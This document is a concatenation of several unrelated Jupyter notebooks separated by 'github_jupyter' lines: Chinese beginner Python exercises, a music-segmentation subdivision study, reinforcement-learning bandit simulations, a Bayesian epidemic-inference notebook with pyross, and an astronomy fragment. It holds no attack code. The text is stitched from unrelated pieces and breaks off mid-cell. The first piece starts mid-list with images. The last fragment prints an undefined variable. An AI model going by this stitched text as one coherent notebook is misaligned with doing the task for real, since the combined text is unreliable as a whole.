- 5
<img src="../Photo/11.png"></img>
```
差额=eval(input("请输入差额"))
年利率=eval(input("请输入年利率"))
利息=差额*(年利率/1200)
print(利息)
```
- 6
<img src="../Photo/12.png"></img>
```
v0=eval(input("v0"))
v1=eval(input("v1"))
t=eval(input("t"))
a=(v1-v0)/t
print(a)
```
- 7 进阶
<img src="../Photo/13.png"></img>
```
月存额=eval(input("月存额"))
第一个月=月存额*(1+0.05/12)
print("第一个月后,账户里的数目变为:",第一个月)
第二个月=(月存额+第一个月)*(1+0.05/12)
print("第二个月后,账户里的数目变为:",第二个月)
```
- 8 进阶
<img src="../Photo/14.png"></img>
|
github_jupyter
|
```
import musicntd.scripts.hide_code as hide
```
# From padding to subdivision
As evoked in the 1st notebook, in previous experiments, every bar of the tensor was zero-padded if it was shorter than the longest bar of the song.
This fix is not satisfactory, as it creates null artifacts at the end of most of the slices of the tensor.
## Description of the subdivision method
Instead, we decided to over-sample the chromagram (32-sample hop) and then select the same number of frames in each bar. This way, rather than having equally spaced frames in all bars of the tensor which resulted in slices of the tensor of inequal sizes (before padding), it now computes bar-chromagrams of the same number of frames, which is a parameter to be set. In each bar-chromagram, frames are almost* equally spaced, but the gap between two consecutive frames in two different bars can now be different.
We call **subdivision** of bars the number of frames we select in each bar. This parameter is to be set, and we will try to evaluate a good parameter in the next part of this notebook.
Concretely, let's consider the chromagram of a particular bar, starting at time $t_0$ and ending at time $t_1$. This chromagram contains $n = (t_1 - t_0 + 1) * \frac{s_r}{32}$ frames, with $s_r$ the sampling rate. In this chromagram, given a subdivision $sub$, we will select frame at indexes $\{k * \frac{n}{sub}$ for $k \in [0, sub[$ and $k$ integer $\}$. As indexes need to be integers, we need to round the precedent expression.
*almost, because of the rounding operation presented above
# Setting the subdivision parameter
We will test three values for the subdivision parameter:
- 96 (24 beats per bar),
- 128 (32 beats per bar),
- 192 (48 beats per bar).
We will test the segmentation on the entire RWC Popular dataset, with MIREX10 annotations, and by testing several ranks (16,24,32,40) for $H$ and $Q$.
Note that, due to the conclusion in Notebook 2, we now have fixed $W$ to the 12-size identity matrix.
```
# On définit le type d'annotations
annotations_type = "MIREX10"
ranks_rhythm = [16,24,32,40]
ranks_pattern = [16,24,32,40]
```
## Subdivision 96
### Fixed ranks
Below are segmentation results with the subdivision fixed to 96, for the different ranks values, on the RWC Pop dataset.
Results are computed with tolerance of respectively 0.5 seconds and 3 seconds.
```
zero_five_nine, three_nine = hide.compute_ranks_RWC(ranks_rhythm,ranks_pattern, W = "chromas", annotations_type = annotations_type,
subdivision=96, penalty_weight = 1)
```
### Oracle ranks
In this condition, we only keep the ranks leading to the highest F measure.
In that sense, it's an optimistic upper bound on metrics.
```
hide.printmd("**A 0.5 secondes:**")
best_chr_zero_five = hide.best_f_one_score_rank(zero_five_nine)
hide.printmd("**A 3 secondes:**")
best_chr_three = hide.best_f_one_score_rank(three_nine)
```
Below is presented the distribution of the optimal ranks in the "oracle ranks" condition, _i.e._ the distribution of the ranks for $H$ and $Q$ which result in the highest F measure for the different songs.
```
hide.plot_3d_ranks_study(zero_five_nine, ranks_rhythm, ranks_pattern)
```
Below is shown the distribution histogram of the F measure obtained with the oracle ranks.
```
hide.plot_f_mes_histogram(zero_five_nine)
```
Finally, here are displayed the 5 worst songs in term of F measure in this condition.
```
hide.return_worst_songs(zero_five_nine, 5)
```
## Subdivision 128
### Fixed ranks
Below are segmentation results with the subdivision fixed to 128, for the different ranks values, on the RWC Pop dataset.
Results are computed with tolerance of respectively 0.5 seconds and 3 seconds.
```
zero_five_cent, three_cent = hide.compute_ranks_RWC(ranks_rhythm,ranks_pattern, W = "chromas", annotations_type = annotations_type,
subdivision=128, penalty_weight = 1)
```
### Oracle ranks
In this condition, we only keep the ranks leading to the highest F measure.
In that sense, it's an optimistic upper bound.
```
hide.printmd("**A 0.5 secondes:**")
best_chr_zero_five = hide.best_f_one_score_rank(zero_five_cent)
hide.printmd("**A 3 secondes:**")
best_chr_three = hide.best_f_one_score_rank(three_cent)
```
Below is presented the distribution of the optimal ranks in the "oracle ranks" condition, _i.e._ the distribution of the ranks for $H$ and $Q$ which result in the highest F measure for the different songs.
```
hide.plot_3d_ranks_study(zero_five_cent, ranks_rhythm, ranks_pattern)
```
Below is shown the distribution histogram of the F measure obtained with the oracle ranks.
```
hide.plot_f_mes_histogram(zero_five_cent)
```
Finally, here are displayed the 5 worst songs in term of F measure in this condition.
```
hide.return_worst_songs(zero_five_cent, 5)
```
## Subdivision 192
### Fixed ranks
Below are segmentation results with the subdivision fixed to 192, for the different ranks values, on the RWC Pop dataset.
Results are computed with tolerance of respectively 0.5 seconds and 3 seconds.
```
zero_five_hunnine, three_hunnine = hide.compute_ranks_RWC(ranks_rhythm,ranks_pattern, W = "chromas", annotations_type = annotations_type,
subdivision=192, penalty_weight = 1)
```
### Oracle ranks
In this condition, we only keep the ranks leading to the highest F measure.
In that sense, it's an optimistic upper bound.
```
hide.printmd("**A 0.5 secondes:**")
best_chr_zero_five = hide.best_f_one_score_rank(zero_five_hunnine)
hide.printmd("**A 3 secondes:**")
best_chr_three = hide.best_f_one_score_rank(three_hunnine)
```
Below is presented the distribution of the optimal ranks in the "oracle ranks" condition, _i.e._ the distribution of the ranks for $H$ and $Q$ which result in the highest F measure for the different songs.
```
hide.plot_3d_ranks_study(zero_five_hunnine, ranks_rhythm, ranks_pattern)
```
Below is shown the distribution histogram of the F measure obtained with the oracle ranks.
```
hide.plot_f_mes_histogram(zero_five_hunnine)
```
Finally, here are displayed the 5 worst songs in term of F measure in this condition.
```
hide.return_worst_songs(zero_five_hunnine, 5)
```
# Conclusion
We didn't find the difference in the segmentation results to be significative.
In that sense, we concluded that the three tested subdivisions were equally satisfying for our experiments, and we decided to pursue with the **96** subdivision only, in order to reduce computation time and complexity, as it is the smallest tested value.
96 also presents the advantage (compared to 128) to be divisible by 3 and 4, which are the most common number of beats per bar in western pop music (even if, for now, we have restricted our study to music with 4 beats per bar).
|
github_jupyter
|
```
#######################################################################
# Copyright (C) #
# 2016-2018 Shangtong Zhang(zhangshangtong.cpp@gmail.com) #
# 2016 Tian Jun(tianjun.cpp@gmail.com) #
# 2016 Artem Oboturov(oboturov@gmail.com) #
# 2016 Kenta Shimada(hyperkentakun@gmail.com) #
# Permission given to modify the code as long as you keep this #
# declaration at the top #
#######################################################################
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
%matplotlib inline
import numpy as np
from tqdm import tqdm
class Bandit:
# @k_arm: # of arms
# @epsilon: probability for exploration in epsilon-greedy algorithm
# @initial: initial estimation for each action
# @step_size: constant step size for updating estimations
# @sample_averages: if True, use sample averages to update estimations instead of constant step size
# @UCB_param: if not None, use UCB algorithm to select action
# @gradient: if True, use gradient based bandit algorithm
# @gradient_baseline: if True, use average reward as baseline for gradient based bandit algorithm
def __init__(self, k_arm=10, epsilon=0., initial=0., step_size=0.1, sample_averages=False, UCB_param=None,
gradient=False, gradient_baseline=False, true_reward=0.):
self.k = k_arm
self.step_size = step_size
self.sample_averages = sample_averages
self.indices = np.arange(self.k)
self.time = 0
self.UCB_param = UCB_param
self.gradient = gradient
self.gradient_baseline = gradient_baseline
self.average_reward = 0
self.true_reward = true_reward
self.epsilon = epsilon
self.initial = initial
def reset(self):
# real reward for each action
self.q_true = np.random.randn(self.k) + self.true_reward
# estimation for each action
self.q_estimation = np.zeros(self.k) + self.initial
# # of chosen times for each action
self.action_count = np.zeros(self.k)
self.best_action = np.argmax(self.q_true)
# get an action for this bandit
def act(self):
if np.random.rand() < self.epsilon:
return np.random.choice(self.indices)
if self.UCB_param is not None:
UCB_estimation = self.q_estimation + \
self.UCB_param * np.sqrt(np.log(self.time + 1) / (self.action_count + 1e-5))
q_best = np.max(UCB_estimation)
return np.random.choice([action for action, q in enumerate(UCB_estimation) if q == q_best])
if self.gradient:
exp_est = np.exp(self.q_estimation)
self.action_prob = exp_est / np.sum(exp_est)
return np.random.choice(self.indices, p=self.action_prob)
return np.argmax(self.q_estimation)
# take an action, update estimation for this action
def step(self, action):
# generate the reward under N(real reward, 1)
reward = np.random.randn() + self.q_true[action]
self.time += 1
self.average_reward = (self.time - 1.0) / self.time * self.average_reward + reward / self.time
self.action_count[action] += 1
if self.sample_averages:
# update estimation using sample averages
self.q_estimation[action] += 1.0 / self.action_count[action] * (reward - self.q_estimation[action])
elif self.gradient:
one_hot = np.zeros(self.k)
one_hot[action] = 1
if self.gradient_baseline:
baseline = self.average_reward
else:
baseline = 0
self.q_estimation = self.q_estimation + self.step_size * (reward - baseline) * (one_hot - self.action_prob)
else:
# update estimation with constant step size
self.q_estimation[action] += self.step_size * (reward - self.q_estimation[action])
return reward
def simulate(runs, time, bandits):
best_action_counts = np.zeros((len(bandits), runs, time))
rewards = np.zeros(best_action_counts.shape)
for i, bandit in enumerate(bandits):
for r in tqdm(range(runs)):
bandit.reset()
for t in range(time):
action = bandit.act()
reward = bandit.step(action)
rewards[i, r, t] = reward
if action == bandit.best_action:
best_action_counts[i, r, t] = 1
best_action_counts = best_action_counts.mean(axis=1)
rewards = rewards.mean(axis=1)
return best_action_counts, rewards
def figure_2_1():
plt.violinplot(dataset=np.random.randn(200,10) + np.random.randn(10))
plt.xlabel("Action")
plt.ylabel("Reward distribution")
plt.show()
figure_2_1()
def figure_2_2(runs=2000, time=1000):
epsilons = [0, 0.1, 0.01]
bandits = [Bandit(epsilon=eps, sample_averages=True) for eps in epsilons]
best_action_counts, rewards = simulate(runs, time, bandits)
plt.figure(figsize=(10, 20))
plt.subplot(2, 1, 1)
for eps, rewards in zip(epsilons, rewards):
plt.plot(rewards, label='epsilon = %.02f' % (eps))
plt.xlabel('steps')
plt.ylabel('average reward')
plt.legend()
plt.subplot(2, 1, 2)
for eps, counts in zip(epsilons, best_action_counts):
plt.plot(counts, label='epsilon = %.02f' % (eps))
plt.xlabel('steps')
plt.ylabel('% optimal action')
plt.legend()
plt.show()
figure_2_2()
def figure_2_3(runs=2000, time=1000):
bandits = []
bandits.append(Bandit(epsilon=0, initial=5, step_size=0.1))
bandits.append(Bandit(epsilon=0.1, initial=0, step_size=0.1))
best_action_counts, _ = simulate(runs, time, bandits)
plt.plot(best_action_counts[0], label='epsilon = 0, q = 5')
plt.plot(best_action_counts[1], label='epsilon = 0.1, q = 0')
plt.xlabel('Steps')
plt.ylabel('% optimal action')
plt.legend()
plt.show()
figure_2_3()
def figure_2_4(runs=2000, time=1000):
bandits = []
bandits.append(Bandit(epsilon=0, UCB_param=2, sample_averages=True))
bandits.append(Bandit(epsilon=0.1, sample_averages=True))
_, average_rewards = simulate(runs, time, bandits)
plt.plot(average_rewards[0], label='UCB c = 2')
plt.plot(average_rewards[1], label='epsilon greedy epsilon = 0.1')
plt.xlabel('Steps')
plt.ylabel('Average reward')
plt.legend()
plt.show()
figure_2_4()
def figure_2_5(runs=2000, time=1000):
bandits = []
bandits.append(Bandit(gradient=True, step_size=0.1, gradient_baseline=True, true_reward=4))
bandits.append(Bandit(gradient=True, step_size=0.1, gradient_baseline=False, true_reward=4))
bandits.append(Bandit(gradient=True, step_size=0.4, gradient_baseline=True, true_reward=4))
bandits.append(Bandit(gradient=True, step_size=0.4, gradient_baseline=False, true_reward=4))
best_action_counts, _ = simulate(runs, time, bandits)
labels = ['alpha = 0.1, with baseline',
'alpha = 0.1, without baseline',
'alpha = 0.4, with baseline',
'alpha = 0.4, without baseline']
for i in range(0, len(bandits)):
plt.plot(best_action_counts[i], label=labels[i])
plt.xlabel('Steps')
plt.ylabel('% Optimal action')
plt.legend()
plt.show()
figure_2_5()
def figure_2_6(runs=2000, time=1000):
labels = ['epsilon-greedy', 'gradient bandit',
'UCB', 'optimistic initialization']
generators = [lambda epsilon: Bandit(epsilon=epsilon, sample_averages=True),
lambda alpha: Bandit(gradient=True, step_size=alpha, gradient_baseline=True),
lambda coef: Bandit(epsilon=0, UCB_param=coef, sample_averages=True),
lambda initial: Bandit(epsilon=0, initial=initial, step_size=0.1)]
parameters = [np.arange(-7, -1, dtype=np.float),
np.arange(-5, 2, dtype=np.float),
np.arange(-4, 3, dtype=np.float),
np.arange(-2, 3, dtype=np.float)]
bandits = []
for generator, parameter in zip(generators, parameters):
for param in parameter:
bandits.append(generator(pow(2, param)))
_, average_rewards = simulate(runs, time, bandits)
rewards = np.mean(average_rewards, axis=1)
i = 0
for label, parameter in zip(labels, parameters):
l = len(parameter)
plt.plot(parameter, rewards[i:i+l], label=label)
i += l
plt.xlabel('Parameter(2^x)')
plt.ylabel('Average reward')
plt.legend()
plt.show()
figure_2_6()
```
|
github_jupyter
|
## inference in simple model using synthetic data
population size 10^6, inference window 2x4 = 8 days, to be compared with ``-win5`` analogous notebook
```
%env OMP_NUM_THREADS=1
%matplotlib inline
import numpy as np
import os
import pickle
import pprint
import time
import pyross
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
#from matplotlib import rc; rc('text', usetex=True)
import synth_fns
```
(cell 3 was removed to hide local file info)
### main settings
```
## for dataFiles : needs a fresh value in every notebook
fileRoot = 'dataSynthInfTest-pop1e6-win2'
## total population
popN = 1e6
## tau-leaping param, take this negative to force gillespie
## or set a small value for high-accuracy tau-leap (eg 1e-4 or 1e-5)
leapEps = -1
## do we use small tolerances for the likelihood computations? (use False for debug etc)
isHighAccuracy = True
# absolute tolerance for logp for MAP
inf_atol = 1.0
## prior mean of beta, divided by true value (set to 1.0 for the simplest case)
betaPriorOffset = 0.8
betaPriorLogNorm = False
## mcmc
mcSamples = 5000
nProcMCMC = 2 # None ## take None to use default but large numbers are not efficient in this example
trajSeed = 18
infSeed = 21
mcSeed = infSeed+2
loadTraj = False
saveMC = True
```
### model
```
model_dict = synth_fns.get_model(popN)
model_spec = model_dict['mod']
contactMatrix = model_dict['CM']
parameters_true = model_dict['params']
cohortsM = model_dict['cohortsM']
Ni = model_dict['cohortsPop']
```
#### more settings
```
## total trajectory time (bare units)
Tf_bare = 20
## total inf time
Tf_inf_bare = 2
## inference period starts when the total deaths reach this amount (as a fraction)
fracDeaths = 2e-3 # int(N*200/1e5)
## hack to get higher-frequency data
## how many data points per "timestep" (in original units)
fineData = 4
## this assumes that all parameters are rates !!
for key in parameters_true:
#print(key,parameters_true[key])
parameters_true[key] /= fineData
Tf = Tf_bare * fineData;
Nf = Tf+1
Tf_inference = Tf_inf_bare * fineData
Nf_inference = Tf_inference+1
```
### plotting helper functions
```
def plotTraj(M,data_array,Nf_start,Tf_inference,fineData):
fig = plt.figure(num=None, figsize=(6, 4), dpi=80, facecolor='w', edgecolor='k')
#plt.rc('text', usetex=True)
plt.rc('font', family='serif', size=12)
t = np.linspace(0, Tf/fineData, Nf)
# plt.plot(t, np.sum(data_array[:, :M], axis=1), '-o', label='S', lw=4)
plt.plot(t, np.sum(data_array[:, M:2*M], axis=1), '-o', label='Exposed', lw=2)
plt.plot(t, np.sum(data_array[:, 2*M:3*M], axis=1), '-o', label='Infected', lw=2)
plt.plot(t, np.sum(data_array[:, 3*M:4*M], axis=1), '-o', label='Deaths', lw=2)
#plt.plot(t, N-np.sum(data_array[:, 0:4*M], axis=1), '-o', label='Rec', lw=2)
plt.axvspan(Nf_start/fineData, (Nf_start+Tf_inference)/fineData,alpha=0.3, color='dodgerblue')
plt.legend()
plt.show()
fig,axs = plt.subplots(1,2, figsize=(12, 5), dpi=80, facecolor='w', edgecolor='k')
ax = axs[0]
ax.plot(t[1:],np.diff(np.sum(data_array[:, 3*M:4*M], axis=1)),'o-',label='death increments', lw=1)
ax.legend(loc='upper right') ; # plt.show()
ax = axs[1]
ax.plot(t,np.sum(data_array[:, 3*M:4*M], axis=1),'o-',label='deaths',ms=3)
ax.legend() ;
plt.show()
def plotMAP(res,data_array,M,N,estimator,Nf_start,Tf_inference,fineData):
print('**beta(bare units)',res['params_dict']['beta']*fineData)
print('**logLik',res['log_likelihood'],'true was',logpTrue)
print('\n')
print(res)
fig,axs = plt.subplots(1,3, figsize=(15, 7), dpi=80, facecolor='w', edgecolor='k')
plt.subplots_adjust(wspace=0.3)
#plt.rc('text', usetex=True)
plt.rc('font', family='serif', size=12)
t = np.linspace(0, Tf/fineData, Nf)
ax = axs[0]
#plt.plot(t, np.sum(data_array[:, :M], axis=1), '-o', label='S', lw=4)
ax.plot(t, np.sum(data_array[:, M:2*M], axis=1), 'o', label='Exposed', lw=2)
ax.plot(t, np.sum(data_array[:, 2*M:3*M], axis=1), 'o', label='Infected', lw=2)
ax.plot(t, np.sum(data_array[:, 3*M:4*M], axis=1), 'o', label='Deaths', lw=2)
#plt.plot(t, N-np.sum(data_array[:, 0:4*M], axis=1), '-o', label='Rec', lw=2)
tt = np.linspace(Nf_start, Tf, Nf-Nf_start,)/fineData
xm = estimator.integrate(res['x0'], Nf_start, Tf, Nf-Nf_start, dense_output=False)
#plt.plot(tt, np.sum(xm[:, :M], axis=1), '-x', label='S-MAP', lw=2, ms=3)
ax.plot(tt, np.sum(xm[:, M:2*M], axis=1), '-x', color='C0',label='E-MAP', lw=2, ms=3)
ax.plot(tt, np.sum(xm[:, 2*M:3*M], axis=1), '-x', color='C1',label='I-MAP', lw=2, ms=3)
ax.plot(tt, np.sum(xm[:, 3*M:4*M], axis=1), '-x', color='C2',label='D-MAP', lw=2, ms=3)
#plt.plot(tt, N-np.sum(xm[:, :4*M], axis=1), '-o', label='R-MAP', lw=2)
ax.axvspan(Nf_start/fineData, (Nf_start+Tf_inference)/fineData,alpha=0.3, color='dodgerblue')
ax.legend()
ax = axs[1]
ax.plot(t[1:], np.diff(np.sum(data_array[:, 3*M:4*M], axis=1)), '-o', label='death incs', lw=2)
ax.plot(tt[1:], np.diff(np.sum(xm[:, 3*M:4*M], axis=1)), '-x', label='MAP', lw=2, ms=3)
ax.axvspan(Nf_start/fineData, (Nf_start+Tf_inference)/fineData,alpha=0.3, color='dodgerblue')
ax.legend()
ax = axs[2]
ax.plot(t, np.sum(data_array[:, :M], axis=1), '-o', label='Sus', lw=1.5, ms=3)
#plt.plot(t, np.sum(data_array[:, M:2*M], axis=1), '-o', label='Exposed', lw=2)
#plt.plot(t, np.sum(data_array[:, 2*M:3*M], axis=1), '-o', label='Infected', lw=2)
#plt.plot(t, np.sum(data_array[:, 3*M:4*M], axis=1), '-o', label='Deaths', lw=2)
ax.plot(t, N-np.sum(data_array[:, 0:4*M], axis=1), '-o', label='Rec', lw=1.5, ms=3)
#infResult = res
tt = np.linspace(Nf_start, Tf, Nf-Nf_start,)/fineData
xm = estimator.integrate(res['x0'], Nf_start, Tf, Nf-Nf_start, dense_output=False)
ax.plot(tt, np.sum(xm[:, :M], axis=1), '-x', label='S-MAP', lw=2, ms=3)
#plt.plot(tt, np.sum(xm[:, M:2*M], axis=1), '-x', label='E-MAP', lw=2, ms=3)
#plt.plot(tt, np.sum(xm[:, 2*M:3*M], axis=1), '-x', label='I-MAP', lw=2, ms=3)
#plt.plot(tt, np.sum(xm[:, 3*M:4*M], axis=1), '-x', label='D-MAP', lw=2, ms=3)
ax.plot(tt, N-np.sum(xm[:, :4*M], axis=1), '-x', label='R-MAP', lw=1.5, ms=3)
ax.axvspan(Nf_start/fineData, (Nf_start+Tf_inference)/fineData,alpha=0.3, color='dodgerblue')
ax.legend()
plt.show()
def plotMCtrace(selected_dims, sampler, numTrace=None):
# Plot the trace for these dimensions:
plot_dim = len(selected_dims)
plt.rcParams.update({'font.size': 14})
fig, axes = plt.subplots(plot_dim, figsize=(12, plot_dim), sharex=True)
samples = sampler.get_chain()
if numTrace == None : numTrace = np.shape(samples)[1] ## corrected index
for ii,dd in enumerate(selected_dims):
ax = axes[ii]
ax.plot(samples[:, :numTrace , dd], "k", alpha=0.3)
ax.set_xlim(0, len(samples))
axes[-1].set_xlabel("step number");
plt.show(fig)
plt.close()
def plotPosteriors(estimator,obsData, fltrDeath, Tf_inference,param_priors, init_priors,contactMatrix,
infResult,parameters_true,trueInit) :
## used for prior pdfs
(likFun,priFun,dimFlat) = pyross.evidence.latent_get_parameters(estimator,
obsData, fltrDeath, Tf_inference,
param_priors, init_priors,
contactMatrix,
#intervention_fun=interventionFn,
tangent=False,
)
xVals = np.linspace(parameters_true['beta']*0.5,parameters_true['beta']*1.5,100)
betas = [ rr['params_dict']['beta'] for rr in result_mcmc ]
plt.hist(betas,density=True,color='lightblue',label='posterior')
yVal=2
plt.plot([infResult['params_dict']['beta']],[2*yVal],'bs',label='MAP',ms=10)
plt.plot([parameters_true['beta']],[yVal],'ro',label='true',ms=10)
## this is a bit complicated, it just finds the prior for beta from the infResult
var='beta'
jj = infResult['param_keys'].index(var)
xInd = infResult['param_guess_range'][jj]
#print(jj,xInd)
pVals = []
for xx in xVals :
flatP = np.zeros( dimFlat )
flatP[xInd] = xx
pdfAll = np.exp( priFun.logpdf(flatP) )
pVals.append( pdfAll[xInd] )
plt.plot(xVals,pVals,color='darkgreen',label='prior')
plt.xlabel(var)
plt.ylabel('pdf')
plt.legend()
labs=['init S','init E','init I']
nPanel=3
fig,axs = plt.subplots(1,nPanel,figsize=(14,4))
for ii in range(nPanel) :
ax = axs[ii]
yVal=1.0/popN
xs = [ rr['x0'][ii] for rr in result_mcmc ]
ax.hist(xs,color='lightblue',density=True)
ax.plot([infResult['x0'][ii]],yVal,'bs',label='true')
ax.plot([trueInit[ii]],yVal,'ro',label='true')
## this is a bit complicated, it just finds the prior for beta from the infResult
## axis ranges
xMin = np.min(xs)*0.8
xMax = np.max(xs)*1.2
xVals = np.linspace(xMin,xMax,100)
## this ID is a negative number because the init params are the end of the 'flat' param array
paramID = ii-nPanel
pVals = []
for xx in xVals :
flatP = np.zeros( dimFlat )
flatP[paramID] = xx
pdfAll = np.exp( priFun.logpdf(flatP) )
pVals.append( pdfAll[paramID] )
ax.plot(xVals,pVals,color='darkgreen',label='prior')
#plt.xlabel(var)
ax.set_xlabel(labs[ii])
ax.set_ylabel('pdf')
ax.yaxis.set_ticklabels([])
plt.show()
```
### synthetic data
```
if loadTraj :
ipFile = fileRoot+'-stochTraj.npy'
syntheticData = np.load(ipFile)
print('loading trajectory from',ipFile)
else :
ticTime = time.time()
syntheticData = synth_fns.make_stochastic_traj(Tf,Nf,trajSeed,model_dict,leapEps)
tocTime = time.time() - ticTime
print('traj generation time',tocTime,'secs')
np.save(fileRoot+'-stochTraj.npy',syntheticData)
Nf_start = synth_fns.get_start_time(syntheticData, popN, fracDeaths)
print('inf starts at timePoint',Nf_start)
plotTraj(cohortsM,syntheticData,Nf_start,Tf_inference,fineData)
```
### basic inference (estimator) setup
(including computation of likelihood for the true parameters)
```
[estimator,fltrDeath,obsData,trueInit] = synth_fns.get_estimator(isHighAccuracy,model_dict,syntheticData, popN, Nf_start, Nf_inference,)
## compute log-likelihood of true params
logpTrue = -estimator.minus_logp_red(parameters_true, trueInit, obsData, fltrDeath, Tf_inference,
contactMatrix, tangent=False)
print('**logLikTrue',logpTrue,'\n')
print('death data\n',obsData,'length',np.size(obsData),Nf_inference)
```
### priors
```
[param_priors,init_priors] = synth_fns.get_priors(model_dict,betaPriorOffset,betaPriorLogNorm,fracDeaths,estimator)
print('Prior Params:',param_priors)
print('Prior Inits:')
pprint.pprint(init_priors)
print('trueBeta',parameters_true['beta'])
print('trueInit',trueInit)
```
### inference (MAP)
```
infResult = synth_fns.do_inf(estimator, obsData, fltrDeath, syntheticData,
popN, Tf_inference, infSeed, param_priors,init_priors, model_dict, inf_atol)
#pprint.pprint(infResult)
print('MAP likelihood',infResult['log_likelihood'],'true',logpTrue)
print('MAP beta',infResult['params_dict']['beta'],'true',parameters_true['beta'])
```
### plot MAP trajectory
```
plotMAP(infResult,syntheticData,cohortsM,popN,estimator,Nf_start,Tf_inference,fineData)
```
#### slice of likelihood
(note this is not the posterior, hence MAP is not exactly at the peak)
```
## range for beta (relative to MAP)
rangeParam = 0.1
[bVals,likVals] = synth_fns.sliceLikelihood(rangeParam,infResult,
estimator,obsData,fltrDeath,contactMatrix,Tf_inference)
#print('logLiks',likVals,logp)
plt.plot(bVals , likVals, 'o-')
plt.plot(infResult['params_dict']['beta'],infResult['log_likelihood'],'s',ms=6)
plt.show()
```
### MCMC
```
sampler = synth_fns.do_mcmc(mcSamples, nProcMCMC, estimator, Tf_inference, infResult,
obsData, fltrDeath, param_priors, init_priors,
model_dict,infSeed)
plotMCtrace([0,2,3], sampler)
result_mcmc = synth_fns.load_mcmc_result(estimator, obsData, fltrDeath, sampler, param_priors, init_priors, model_dict)
print('result shape',np.shape(result_mcmc))
print('last sample\n',result_mcmc[-1])
```
#### save the result
```
if saveMC :
opFile = fileRoot + "-mcmc.pik"
print('opf',opFile)
with open(opFile, 'wb') as f:
pickle.dump([infResult,result_mcmc],f)
```
#### estimate MCMC autocorrelation
```
# these are the estimated autocorrelation times for the sampler
# (it likes runs ~50 times longer than this...)
pp = sampler.get_log_prob()
nSampleTot = np.shape(pp)[0]
#print('correl',sampler.get_autocorr_time(discard=int(nSampleTot/3)))
print('nSampleTot',nSampleTot)
```
#### plot posterior distributions
```
plotPosteriors(estimator,obsData, fltrDeath, Tf_inference,param_priors, init_priors,contactMatrix,
infResult,parameters_true,trueInit)
```
### analyse posterior for beta
```
betas = [ rr['params_dict']['beta'] for rr in result_mcmc ]
postMeanBeta = np.mean(betas)
postStdBeta = np.std(betas)
postCIBeta = [ np.percentile(betas,2.5) , np.percentile(betas,97.5)]
print("beta: true {b:.5f} MAP {m:.5f}".format(b=parameters_true['beta'],m=infResult['params_dict']['beta']))
print("post: mean {m:.5f} std {s:.5f} CI95: {l:.5f} {u:.5f}".format(m=postMeanBeta,
s=postStdBeta,
l=postCIBeta[0],u=postCIBeta[1]))
```
### posterior correlations for initial conditions
```
sis = np.array( [ rr['x0'][0] for rr in result_mcmc ] )/popN
eis = np.array( [ rr['x0'][1] for rr in result_mcmc ] )/popN
iis = np.array( [ rr['x0'][2] for rr in result_mcmc ] )/popN
betas = [ rr['params_dict']['beta'] for rr in result_mcmc ]
fig,axs = plt.subplots(1,3,figsize=(15,4))
plt.subplots_adjust(wspace=0.35)
ax = axs[0]
ax.plot(eis,iis,'o',ms=2)
ax.set_xlabel('E0')
ax.set_ylabel('I0')
ax = axs[1]
ax.plot(1-eis-iis-sis,sis,'o',ms=2)
ax.set_ylabel('S0')
ax.set_xlabel('R0')
ax = axs[2]
ax.plot(1-eis-iis-sis,betas,'o',ms=2)
ax.set_ylabel('beta')
ax.set_xlabel('R0')
plt.show()
def forecast(result_mcmc, nsamples, Nf_start, Tf_inference, Nf_inference, estimator, obs, fltr, contactMatrix):
trajs = []
#x = (data_array[Nf_start:Nf_start+Nf_inference])
#obs=np.einsum('ij,kj->ki', fltr, x)
# this should pick up the right number of traj, equally spaced
totSamples = len(result_mcmc)
skip = int(totSamples/nsamples)
modulo = totSamples % skip
#print(modulo,skip)
for sample_res in result_mcmc[modulo::skip]:
endpoints = estimator.sample_endpoints(obs, fltr, Tf_inference, sample_res, 1, contactMatrix=contactMatrix)
xm = estimator.integrate(endpoints[0], Nf_start+Tf_inference, Tf, Nf-Tf_inference-Nf_start, dense_output=False)
trajs.append(xm)
return trajs
def plot_forecast(allTraj, data_array, nsamples, Tf,Nf, Nf_start, Tf_inference, Nf_inference, M,
estimator, obs, contactMatrix):
#x = (data_array[Tf_start:Tf_start+Nf_inference]).astype('float')
#obs=np.einsum('ij,kj->ki', fltr, x)
#samples = estimator.sample_endpoints(obs, fltr, Tf_inference, res, nsamples, contactMatrix=contactMatrix)
time_points = np.linspace(0, Tf, Nf)
fig = plt.figure(num=None, figsize=(10, 8), dpi=80, facecolor='w', edgecolor='k')
plt.rcParams.update({'font.size': 22})
#for x_start in samples:
for traj in allTraj:
#xm = estimator.integrate(x_start, Tf_start+Tf_inference, Tf, Nf-Tf_inference-Tf_start, dense_output=False)
# plt.plot(time_points[Tf_inference+Tf_start:], np.sum(xm[:, M:2*M], axis=1), color='grey', alpha=0.1)
# plt.plot(time_points[Tf_inference+Tf_start:], np.sum(xm[:, 2*M:3*M], axis=1), color='grey', alpha=0.1)
incDeaths = np.diff( np.sum(traj[:, 3*M:4*M], axis=1) )
plt.plot(time_points[1+Tf_inference+Nf_start:], incDeaths, color='grey', alpha=0.2)
# plt.plot(time_points, np.sum(data_array[:, M:2*M], axis=1), label='True E')
# plt.plot(time_points, np.sum(data_array[:, 2*M:3*M], axis=1), label='True I')
incDeathsObs = np.diff( np.sum(data_array[:, 3*M:4*M], axis=1) )
plt.plot(time_points[1:],incDeathsObs, 'ko', label='True D')
plt.axvspan(Nf_start, Tf_inference+Nf_start,
label='Used for inference',
alpha=0.3, color='dodgerblue')
plt.xlim([0, Tf])
plt.legend()
plt.show()
nsamples = 40
foreTraj = forecast(result_mcmc, nsamples, Nf_start, Tf_inference, Nf_inference,
estimator, obsData, fltrDeath, contactMatrix)
print(len(foreTraj))
foreTraj = np.array( foreTraj )
np.save(fileRoot+'-foreTraj.npy',foreTraj)
plot_forecast(foreTraj, syntheticData, nsamples, Tf,Nf, Nf_start, Tf_inference, Nf_inference, cohortsM,
estimator, obsData, contactMatrix)
print(Nf_inference)
print(len(result_mcmc))
```
|
github_jupyter
|
```
'''
Notebook to specifically study correlations between ELG targets and Galactic foregrounds
Much of this made possible and copied from script shared by Anand Raichoor
Run in Python 3; install pymangle, fitsio, healpy locally: pip install --user fitsio; pip install --user healpy; git clone https://github.com/esheldon/pymangle...
'''
import fitsio
import numpy as np
#from desitarget.io import read_targets_in_hp, read_targets_in_box, read_targets_in_cap
import astropy.io.fits as fits
import glob
import os
import healpy as hp
from matplotlib import pyplot as plt
print(nest)
#Some information is in pixelized map
#get nside and nest from header
